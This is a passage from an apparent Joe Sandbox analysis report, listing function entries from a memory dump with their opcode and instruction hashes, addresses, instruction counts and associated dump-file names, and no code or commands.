                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ab09da1b2ff989b861cae1075e0d483c82f414caa9ed09605cc5c2a4e96eda11
                                                                                                                    • Instruction ID: 194c31ff0ca767048b1df2e73922d89a83213d6e9cf7d67ee66609dee1cbf834
                                                                                                                    • Opcode Fuzzy Hash: ab09da1b2ff989b861cae1075e0d483c82f414caa9ed09605cc5c2a4e96eda11
                                                                                                                    • Instruction Fuzzy Hash: 5B41C03160C3508FC705EF68C49052EFBE6AF9A310F199A2DE4D9DB2A1DB75DD058B82
                                                                                                                    Function 0010D961 Relevance: .1, Instructions: 121COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 757933f3e48c0a990d0e31721d79356cf71287badfb0f9e893aa1b34f0123331
                                                                                                                    • Instruction ID: 4a3a2b9ae8811fcb83c0938ee475b5a58430b9e0ef70279c635e5781a2480fe9
                                                                                                                    • Opcode Fuzzy Hash: 757933f3e48c0a990d0e31721d79356cf71287badfb0f9e893aa1b34f0123331
                                                                                                                    • Instruction Fuzzy Hash: B0419FB5608385CBD7309F54D841BABB7B0FF96364F080959E5CA8BAA2D7B44940CB53
                                                                                                                    Function 0012F030 Relevance: .1, Instructions: 104COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c5be6113664422e96713363ec41851647c31506b086c17a8b3ff98e201e465e1
                                                                                                                    • Instruction ID: efa6f212f0721d09b0e2675b7cfd47353ee11b4278fbd973641ba63fe781818f
                                                                                                                    • Opcode Fuzzy Hash: c5be6113664422e96713363ec41851647c31506b086c17a8b3ff98e201e465e1
                                                                                                                    • Instruction Fuzzy Hash: 8D2137329082244BC3249B59D481A3BF7F5EB99B04F06863EE9C4A7295E3359C2587E5
                                                                                                                    Function 003913BC Relevance: .1, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 936b2c983ed5788cd9730bdff1eb9880e9192e46445be2931bed5358c46d3cc9
                                                                                                                    • Instruction ID: 9eef336b28dd395eb44fb2628f354cf1647398c7f82c2f811edebdb667731dd5
                                                                                                                    • Opcode Fuzzy Hash: 936b2c983ed5788cd9730bdff1eb9880e9192e46445be2931bed5358c46d3cc9
                                                                                                                    • Instruction Fuzzy Hash: 62318DB250C308EFE3517F18EC456BAFBE4EF95760F02492DE6D052610EB316944DA97
                                                                                                                    Function 001367EF Relevance: .1, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 77b0ee40ac59f6534a91a7835137b4e61ca3ca05758e1f1b5060f6e07a7eefaf
                                                                                                                    • Instruction ID: 7e631ae5eb19a69b8a6718287fa5747a10d3092feeef901330349183f5c319da
                                                                                                                    • Opcode Fuzzy Hash: 77b0ee40ac59f6534a91a7835137b4e61ca3ca05758e1f1b5060f6e07a7eefaf
                                                                                                                    • Instruction Fuzzy Hash: 43311470518382AAD714CF14C49062FBFF0EF96788F54980DF4C8AB261D338D985CB9A
                                                                                                                    Function 00115E70 Relevance: .1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b834654b17d3acbc46d8ac163c0dafde8cace54dd9feafd8cdff0793888fc329
                                                                                                                    • Instruction ID: 7fb40c606edb81874f7af2888d1a980d87b860eb7d66d5f2fa13e819993aed44
                                                                                                                    • Opcode Fuzzy Hash: b834654b17d3acbc46d8ac163c0dafde8cace54dd9feafd8cdff0793888fc329
                                                                                                                    • Instruction Fuzzy Hash: 6421E270409201CBD314AF28C8419ABFBF6EF92764F44892CF4D98B292E334C940CBA3
                                                                                                                    Function 000F49A0 Relevance: .1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cbe2eee255ce80e2df90ed4850d7395439c2c852be5922ee4a7cea5853ec6c97
                                                                                                                    • Instruction ID: 15f4e85968e4f5d891c6b636fd9e3c9e2036dcba00ed18d4b906591b5a379e44
                                                                                                                    • Opcode Fuzzy Hash: cbe2eee255ce80e2df90ed4850d7395439c2c852be5922ee4a7cea5853ec6c97
                                                                                                                    • Instruction Fuzzy Hash: E531D4317482089BD7509E18D881A3BB7E1EF84358F18892CEE9ACB641D375DD52EB47
                                                                                                                    Function 001364B8 Relevance: .1, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 02a9b0c1bac65bdb2d8f5e4671209af607c4ffcd0c7fda654297d59281583e6e
                                                                                                                    • Instruction ID: 93127f152ec9f47d99e401c09ebd3a8a74fe4afbb1382ff4a193fa64118ed25b
                                                                                                                    • Opcode Fuzzy Hash: 02a9b0c1bac65bdb2d8f5e4671209af607c4ffcd0c7fda654297d59281583e6e
                                                                                                                    • Instruction Fuzzy Hash: 99214874A0C240EBD704EF19D490A2EFBE6FB96745F28881CE4C893762C335A850CB62
                                                                                                                    Function 002FDFAF Relevance: .1, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6d8dabea58a8c0d4a024dde127f43e3140df4a754659ade2599dbf5523e77e8c
                                                                                                                    • Instruction ID: 447b5d3bc981f7fa0bdcfeeee89266ecfbd7e84b69cfd0591d7665d1c63984b7
                                                                                                                    • Opcode Fuzzy Hash: 6d8dabea58a8c0d4a024dde127f43e3140df4a754659ade2599dbf5523e77e8c
                                                                                                                    • Instruction Fuzzy Hash: B421F5B211C2049FE351BE29DC867AAB7E5EB58710F06082DE6D4C3610E735A8548B87
                                                                                                                    Function 0012B650 Relevance: .1, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                    • Instruction ID: 49e6e8b7c87cc2a3068fbd2a9dd7647461e963ed78921c916a5668671bbfc9b4
                                                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                    • Instruction Fuzzy Hash: 1C11E933A091E50EC3168D3C94805B5BFA31AA3334B5D4399F4B49B2D2D7228D8A8354
                                                                                                                    Function 00120B80 Relevance: .1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 90022ddfb32469098a8610d4b68e70bc315f5b0e8987f5b71d64abe4c0da561b
                                                                                                                    • Instruction ID: e9036a27d5f56d6e7adc7da9e86cc7b47be44ac784a05e2f1040fd6c33564d21
                                                                                                                    • Opcode Fuzzy Hash: 90022ddfb32469098a8610d4b68e70bc315f5b0e8987f5b71d64abe4c0da561b
                                                                                                                    • Instruction Fuzzy Hash: 6E01D8F9A0031687E731DE10A5D1B3BB2A86F5871CF08462CE90647303DB75FC24C691
                                                                                                                    Function 0011D1E1 Relevance: .0, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8c0c921e417c078c0d1ec35d77fc96df1154c86be001a217bbb2f318d8aff40c
                                                                                                                    • Instruction ID: d3a5ed088604ec1e0f834dc3fae137d838569ceb2a2d17375d48f064ba642af9
                                                                                                                    • Opcode Fuzzy Hash: 8c0c921e417c078c0d1ec35d77fc96df1154c86be001a217bbb2f318d8aff40c
                                                                                                                    • Instruction Fuzzy Hash: 4F111CB0408380AFD3109F609484A2FFBE0EBA6714F148C0DF6A49B251C379E859CF06
                                                                                                                    Function 000F6EA0 Relevance: .0, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24355070d5c7d9ebdcbd4f0139b35eef73a66148af6a3fcb35bee011f617840e
                                                                                                                    • Instruction ID: 9f8213c113cca0e9289bd6993f7590920e466a5a736d9e5ce0298d1409fbdb91
                                                                                                                    • Opcode Fuzzy Hash: 24355070d5c7d9ebdcbd4f0139b35eef73a66148af6a3fcb35bee011f617840e
                                                                                                                    • Instruction Fuzzy Hash: 58F0243A71820E0BA220CDABA8C083BB3D6D7C9354B042539EB40C3A02DD72E806A190
                                                                                                                    Function 0012B8C0 Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dad40b8a8b0cf0c680be38028a9801f4e1e9da1297b4f3b9e1d9df466e9bee7e
                                                                                                                    • Instruction ID: 6506d07c58c905065930edc77b6421f51c28c54387ea28b09faa2761b04cb969
                                                                                                                    • Opcode Fuzzy Hash: dad40b8a8b0cf0c680be38028a9801f4e1e9da1297b4f3b9e1d9df466e9bee7e
                                                                                                                    • Instruction Fuzzy Hash: 1E0162B3A199610B8348CE3DDC1156BBAD15BD5770F19872DBEF5CB3E0D230C8118695
                                                                                                                    Function 0010C5F0 Relevance: .0, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
